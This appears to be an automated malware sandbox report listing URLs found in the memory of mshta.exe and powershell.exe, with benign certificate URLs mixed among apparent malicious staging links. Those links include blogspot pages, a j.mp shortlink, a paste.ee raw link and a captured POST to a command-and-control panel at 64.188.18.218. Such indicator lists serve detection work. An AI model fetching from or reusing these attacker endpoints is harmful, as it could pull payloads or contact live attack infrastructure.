              Source: unknownHTTP traffic detected: POST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 64.188.18.218Content-Length: 368Expect: 100-continueConnection: Keep-Alive
              Source: mshta.exe, 00000006.00000002.2308801585.0000000005947000.00000004.00000001.sdmpString found in binary or memory: Https://www.blogger.com/share-post.g?blogID=9116518222795791100&pageID=8792113328696570758&target=pi
              Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
              Source: mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
              Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
              Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
              Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
              Source: mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmpString found in binary or memory: http://csi.gstatic.com/csi
              Source: mshta.exe, 00000006.00000002.2277240561.0000000003D50000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
              Source: mshta.exe, 00000006.00000002.2277240561.0000000003D50000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
              Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmpString found in binary or memory: http://j.mp/
              Source: mshta.exe, 00000006.00000003.2264502398.00000000003F5000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269237459.0000000000430000.00000004.00000020.sdmpString found in binary or memory: http://j.mp/dbgghasdnasdjasgdakgsdhv
              Source: mshta.exe, 00000006.00000002.2279301165.0000000003F37000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2257266927.0000000002DE7000.00000002.00000001.sdmp, mshta.exe, 00000011.00000002.2226296090.00000000037E7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
              Source: mshta.exe, 00000006.00000002.2279301165.0000000003F37000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2257266927.0000000002DE7000.00000002.00000001.sdmp, mshta.exe, 00000011.00000002.2226296090.00000000037E7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
              Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
              Source: mshta.exe, 00000006.00000003.2246403287.00000000058DC000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gs
              Source: mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gsr202
              Source: mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gts1o1core0
              Source: mshta.exe, 00000006.00000003.2246403287.00000000058DC000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/g
              Source: mshta.exe, 00000006.00000002.2307607404.0000000005853000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
              Source: mshta.exe, 00000006.00000003.2250091244.0000000003B4B000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt05
              Source: mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0C
              Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/BlogPosting
              Source: mshta.exe, 00000006.00000002.2280946216.0000000004230000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2249204389.0000000002220000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
              Source: mshta.exe, 00000006.00000002.2279301165.0000000003F37000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2257266927.0000000002DE7000.00000002.00000001.sdmp, mshta.exe, 00000011.00000002.2226296090.00000000037E7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
              Source: mshta.exe, 00000006.00000002.2279301165.0000000003F37000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2257266927.0000000002DE7000.00000002.00000001.sdmp, mshta.exe, 00000011.00000002.2226296090.00000000037E7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
              Source: mshta.exe, 00000006.00000002.2280946216.0000000004230000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2249204389.0000000002220000.00000002.00000001.sdmp, mshta.exe, 00000011.00000002.2231119435.0000000004080000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
              Source: mshta.exe, 00000006.00000003.2242124105.00000000075EA000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2243633505.0000000008621000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2308627180.000000000592E000.00000004.00000001.sdmpString found in binary or memory: http://www.blogger.com/go/cookiechoices
              Source: mshta.exe, 00000006.00000003.2242124105.00000000075EA000.00000004.00000001.sdmpString found in binary or memory: http://www.cookiechoices.org/
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
              Source: mshta.exe, 00000006.00000002.2277240561.0000000003D50000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
              Source: mshta.exe, 00000006.00000002.2279301165.0000000003F37000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2257266927.0000000002DE7000.00000002.00000001.sdmp, mshta.exe, 00000011.00000002.2226296090.00000000037E7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
              Source: mshta.exe, 00000006.00000002.2277240561.0000000003D50000.00000002.00000001.sdmp, powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
              Source: powershell.exe, 0000000C.00000003.2212263434.00000000002F2000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
              Source: powershell.exe, 0000000C.00000003.2212263434.00000000002F2000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
              Source: powershell.exe, 0000000C.00000002.2255231499.0000000002C00000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
              Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmpString found in binary or memory: https://accounts.google.com/
              Source: mshta.exe, 00000006.00000003.2221495845.0000000005903000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2246295022.0000000005886000.00000004.00000001.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhtt
              Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpString found in binary or memory: https://apis.google.com
              Source: mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250960830.0000000003B3F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2309438572.0000000007590000.00000004.00000001.sdmpString found in binary or memory: https://apis.google.com/js/plusone.js
              Source: mshta.exe, 00000006.00000003.2251143360.00000000058E6000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2242751517.000000000018E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2262198982.00000000001B3000.00000004.00000001.sdmpString found in binary or memory: https://backbones1234511a.blogspot.com/p/stback1.html
              Source: mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmpString found in binary or memory: https://csi.gstatic.com/csi
              Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/
              Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
              Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?lang=en-GB&family=Product
              Source: mshta.exe, 00000006.00000003.2251143360.00000000058E6000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2242751517.000000000018E000.00000004.00000001.sdmpString found in binary or memory: https://ghostbackbone123.blogspot.com/p/ghostbackup13.html
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmpString found in binary or memory: https://i18n-cloud.appspot.com
              Source: mshta.exe, 00000006.00000003.2266503969.0000000000128000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogs
              Source: mshta.exe, 00000006.00000003.2266503969.0000000000128000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot
              Source: mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/
              Source: mshta.exe, 00000006.00000003.2251705614.0000000003480000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/(
              Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/Q
              Source: mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276548700.0000000003B43000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/favicon.ico
              Source: mshta.exe, 00000006.00000002.2309438572.0000000007590000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/favicon.icoe
              Source: mshta.exe, 00000006.00000003.2262320859.00000000001CA000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/feeds/p
              Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2221404976.000000000588B000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/feeds/posts/default
              Source: mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/feeds/posts/default?alt
              Source: mshta.exe, 00000006.00000003.2250723670.000000000341C000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/feeds/posts/default?alt=rss
              Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/feeds/posts/defaultA
              Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/feeds/posts/defaultng
              Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/js/cookienotice.js
              Source: mshta.exe, 00000006.00000003.2221534508.000000000592E000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/js/cookienotice.jsA
              Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/js/cookienotice.jsi
              Source: mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/js/cookienotice.jsp
              Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/js/cookienotice.jspnga
              Source: mshta.exe, 00000006.00000003.2221466352.00000000058DC000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/
              Source: mshta.exe, 00000006.00000002.2306384665.0000000005768000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/----
              Source: mshta.exe, 00000006.00000003.2221466352.00000000058DC000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/X
              Source: mshta.exe, 00000006.00000002.2306384665.0000000005768000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/nap
              Source: mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html
              Source: mshta.exe, 00000006.00000002.2308413634.0000000005903000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html%26bpli%3D1&followup=https://www.blogger.com/blogi
              Source: mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html.
              Source: mshta.exe, 00000006.00000003.2264141461.0000000003A8C000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html...
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html0E)
              Source: mshta.exe, 00000006.00000002.2307104114.00000000057BF000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html5
              Source: mshta.exe, 00000006.00000003.2264048147.00000000057F1000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.html?interstitial=ABqL8_iitRI9UzgP0mZhOmXtKCBQT4eYHp3t
              Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlC
              Source: mshta.exe, 00000006.00000003.2249185523.0000000005919000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlD
              Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlK
              Source: mshta.exe, 00000006.00000003.2220203351.0000000003474000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlabbr
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlcomment_from_post_iframe.js
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmld
              Source: mshta.exe, 00000006.00000003.2250153686.000000000040B000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmldnasdja
              Source: mshta.exe, 00000006.00000003.2250153686.000000000040B000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmldnasdjasgdakgsdhv
              Source: mshta.exe, 00000006.00000003.2246403287.00000000058DC000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlgspo
              Source: mshta.exe, 00000006.00000003.2252538010.0000000002DE3000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlhttps://www.blogger.com/static/v1/jsbin/376796862-
              Source: mshta.exe, 00000006.00000003.2245647822.0000000003AF4000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlkj
              Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmls
              Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlse
              Source: mshta.exe, 00000006.00000003.2264141461.0000000003A8C000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlte
              Source: mshta.exe, 00000006.00000003.2221495845.0000000005903000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlvg
              Source: mshta.exe, 00000006.00000003.2251197338.0000000005857000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlw
              Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/p/st2222.htmlwidgets.js91100&pageID=8792113328696570758
              Source: mshta.exe, 00000006.00000003.2250733419.00000000080A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2309438572.0000000007590000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264460439.0000000003B3E000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/search
              Source: mshta.exe, 00000006.00000003.2251705614.0000000003480000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.com/searchhttps://apis.google.com/js/plusone.js
              Source: mshta.exe, 00000006.00000003.2221495845.0000000005903000.00000004.00000001.sdmpString found in binary or memory: https://mainjigijigi123.blogspot.cost2222.html
              Source: powershell.exe, 0000000C.00000002.2240980870.000000000036F000.00000004.00000020.sdmpString found in binary or memory: https://paste.ee/r/9IDWy
              Source: mshta.exe, 00000006.00000003.2221379994.0000000003B73000.00000004.00000001.sdmpString found in binary or memory: https://pki.goog/repository/0
              Source: mshta.exe, 00000011.00000003.2221428662.0000000000125000.00000004.00000001.sdmpString found in binary or memory: https://randikhanaekminar.blogspot.com/p/st2.html
              Source: mshta.exe, 00000011.00000003.2218959976.0000000003A2C000.00000004.00000001.sdmpString found in binary or memory: https://randikhanaekminar.blogspot.com/p/st2.htmlC:
              Source: mshta.exe, 00000006.00000003.2251197338.0000000005857000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2250219385.0000000000430000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000002.2276548700.0000000003B43000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png)
              Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png).meather)
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png0C;
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmpString found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.pngx6
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmpString found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png
              Source: mshta.exe, 00000006.00000003.2264675792.000000000585E000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250127920.0000000003B45000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2251197338.0000000005857000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2307664079.0000000005858000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png)
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png:
              Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.pngt.co
              Source: mshta.exe, 00000006.00000003.2245292730.0000000003A97000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/img/icon18_edit_allbkg.gif
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmpString found in binary or memory: https://resources.blogblog.com/img/icon18_edit_allbkg.gifogID=9116518222795791100&zx=6c18238f-a384-4
              Source: mshta.exe, 00000006.00000003.2250219385.0000000000430000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.png
              Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.png#
              Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.png;
              Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.pngk
              Source: mshta.exe, 00000006.00000003.2249695813.000000000592E000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.pngq
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmpString found in binary or memory: https://resources.blogblog.com/img/icon18_wrench_allbkg.pngrom_post_iframe.js
              Source: mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/img/triangle_ltr.gif
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/img/triangle_ltr.gif)
              Source: mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/img/triangle_open.gif
              Source: mshta.exe, 00000006.00000003.2244847739.00000000080E4000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/img/widgets/icon_contactform_cross.gif
              Source: mshta.exe, 00000006.00000002.2269752130.000000000047C000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2264900339.000000000047B000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/img/widgets/s_bottom.png
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/img/widgets/s_bottom.png)
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2246005409.0000000003B29000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.2276419704.0000000003B29000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/img/widgets/s_top.png
              Source: mshta.exe, 00000006.00000002.2269527177.000000000045F000.00000004.00000020.sdmp, mshta.exe, 00000006.00000003.2250281158.000000000045F000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/img/widgets/s_top.png)
              Source: mshta.exe, 00000006.00000003.2264275089.000000000582F000.00000004.00000001.sdmpString found in binary or memory: https://s.ytimg.com
              Source: mshta.exe, 00000006.00000002.2276101830.0000000003AF4000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.2283404590.000000000632D000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
              Source: mshta.exe, 00000006.00000003.2251143360.00000000058E6000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.2242751517.000000000018E000.00000004.00000001.sdmpString found in binary or memory: https://startthepartyup.blogspot.com/p/backbone14.html
